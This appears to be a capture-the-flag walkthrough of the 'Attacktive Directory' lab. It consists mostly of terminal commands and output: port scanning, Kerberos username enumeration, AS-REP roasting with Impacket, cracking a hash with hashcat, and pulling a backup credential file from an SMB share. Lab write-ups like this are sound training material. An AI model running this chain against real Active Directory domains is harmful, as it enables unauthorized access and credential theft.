Attacktive Directory

Nmap

root@ip-10-10-166-54:~# nmap -sV 10.10.161.54
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-15 22:08 BST
Nmap scan report for 10.10.161.54
Host is up (0.00091s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-15 21:08:29Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/15%Time=684F3652%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: 02:B9:B4:92:F6:DB (Unknown)
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.78 seconds

Enum4linux

root@ip-10-10-166-54:~# enum4linux -U -o 10.10.161.54
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 15 22:09:37 2025

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.161.54
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.161.54    |
 ==================================================== 
[+] Got domain/workgroup name: THM-AD

 ===================================== 
|    Session Check on 10.10.161.54    |
 ===================================== 
[+] Server 10.10.161.54 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.161.54    |
 =========================================== 
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.161.54    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.161.54 from smbclient: 
[+] Got OS info for 10.10.161.54 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.161.54    |
 ============================= 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
enum4linux complete on Sun Jun 15 22:09:38 2025

Kerbrute

root@ip-10-10-166-54:~# kerbrute userenum -d spookysec.local --dc 10.10.161.54 userlist.txt 

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/15/25 - Ronnie Flathers @ropnop

2025/06/15 22:35:21 >  Using KDC(s):
2025/06/15 22:35:21 >  	10.10.161.54:88

2025/06/15 22:35:21 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:21 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:21 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:21 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:22 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:23 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:25 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:25 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:29 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:30 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:37 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:51 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:35:56 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:36:11 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:36:16 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:36:24 >  [+] VALID USERNAME:	 [email protected]
2025/06/15 22:36:45 >  Done! Tested 73317 usernames (16 valid) in 84.364 seconds

Impacket

root@ip-10-10-166-54:~# python3.9 /opt/impacket/examples/GetNPUsers.py spookysec.local/ -dc-ip 10.10.161.54 -usersfile userlist1.txt -format hashcat -outputfile hashes1.txt
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN doesn't have UF_DONT_REQUIRE_PREAUTH set

root@ip-10-10-166-54:~# cat hashes1.txt 
[email protected]:f566d528b6754f8f1bcde730a30259ad$b7c0aa20eebc15bb4d7a5c533d8801fdbcf40497f25a8313133a8c4ec1e03603d7b5b96705dc855e43520e3a95aceb4498936e439fbe4e7ed5dd8a9c05acd0003cba3b6f91af2bf0ada11deb3e85e2ef850b1a4dc18b7ad684af73e7b7b1ec583f7bbbc9239f4675fc9f6c10150ba7dc5fec4ba623dea9b85c6a2ed9c6eaa6e3d0adc0c6fcce77456f327111693d936742a9e92540e622d3e691ac5002f96a28811395bd81b873763607b235afb59f5baacae368bf7b7ce64b1379e3f20a122800168427713db241719c91749dae5d86b7bb6e56226c5d3b882c4500b3f5fd7fb1464fd59e2b760d8a7cf5bb975b956f1988

Hashcat

root@ip-10-10-166-54:~# hashcat -a 0 -m 18200 hashes.txt passwordlist.txt
hashcat (v6.1.1-66-g6a419d06) starting...

* Device #2: Outdated POCL OpenCL driver detected!

This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.

OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3800/3864 MB (966 MB allocatable), 2MCU

OpenCL API (OpenCL 1.2 pocl 1.4, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
=============================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 35 MB

Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs

[email protected]:3f3e903d83a67ecd9045b71c98178e08$9ccc43641ed4722ec3d941837440a265f86babdd4b97e0c417b8cbfb0f007f72cd89297400423fdcca1cdd81690b5a203222ee99e726fe6787736a30b7b7ce79fc6f97c47c4353f814d486f8085ee17ff408295bc2296c8b951c4eb9a30257b3a5136d1e31a2731e75abcc6057b380a3eb1b0e6b392d371425aa39db7625bd746f193ea1ec8fa3ca08800806b887d4b8ece4df827eec458ffc9429994c22a16f5c3c4ce5c4243b3ba0bf83588f2156fee42fa243b7ba82dbdc7a9863e5ec44892352292568297cfe223b2fa6ebb5050e9acc0cb379217adcb17dcc3ae328c38810538eb4754efdeaf37d3b107b965cf00980:management2005
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: [email protected]:3f3e903d83a...f00980
Time.Started.....: Sun Jun 15 23:23:20 2025 (0 secs)
Time.Estimated...: Sun Jun 15 23:23:20 2025 (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   330.0 kH/s (9.24ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/70188 (11.67%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/70188 (5.84%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitey

Started: Sun Jun 15 23:22:28 2025
Stopped: Sun Jun 15 23:23:21 2025

SMBClient

root@ip-10-10-166-54:~# smbclient -L //spookysec.local -U svc-admin
Password for [WORKGROUP\svc-admin]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backup          Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
root@ip-10-10-166-54:~# smbclient //spookysec.local/backup -U svc-admin
Password for [WORKGROUP\svc-admin]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 20:08:39 2020
  ..                                  D        0  Sat Apr  4 20:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 20:08:53 2020

		8247551 blocks of size 4096. 3640410 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (4.3 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \> ^C
root@ip-10-10-166-54:~# cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

backup@spookysec.local:backup2517860

Impacket